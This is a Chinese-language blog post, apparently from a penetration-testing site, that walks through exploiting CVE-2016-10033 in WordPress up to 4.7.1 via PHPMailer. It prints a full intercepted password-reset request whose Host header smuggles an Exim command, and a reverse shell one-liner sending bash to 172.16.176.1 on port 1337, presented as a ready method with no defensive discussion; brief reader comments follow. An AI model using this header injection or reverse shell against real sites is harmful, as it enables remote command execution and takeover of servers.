WordPress <= 4.7.1 PHPMailer < 5.2.18任意命令執行漏洞(CVE-2016-10033)

释放双眼,带上耳机,听听看~!

影響範圍:WordPress <= 4.7.1 PHPMailer < 5.2.18

漏洞頁面:/wp-login.php?action=lostpassword

去密碼重置頁面輸入重置用戶名爲admin,提交之後攔截請求,並把host的值修改爲我們的payload

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: aa(any [email protected] -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.176.128:8000/wp-login.php?action=lostpassword
Cookie: wordpress_test_cookie=WP+Cookie+check
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

user_login=admin&redirect_to=&wp-submit=Get+New+Password

遠程反彈shell腳本:172.16.176.1:8080/a.txt,內容:

nohup bash -i >/dev/tcp/172.16.176.1/1337 0<&1 2>&1) &
渗透教程漏洞系统安全质量好文

CVE-­2020­-0796(SMBGhost)漏洞利用

2020-6-7 18:08:56

WEB安全漏洞

Discuz!X <=3.4任意刪除漏洞

2020-6-7 21:27:11

4 条回复 A文章作者 M管理员
  1. 大佬爱了爱了~

    • 感謝支持~

  2. 大佬以后能用简体中文写就好了

  3. 66666666666666

个人中心
购物车
优惠劵
有新私信 私信列表
搜索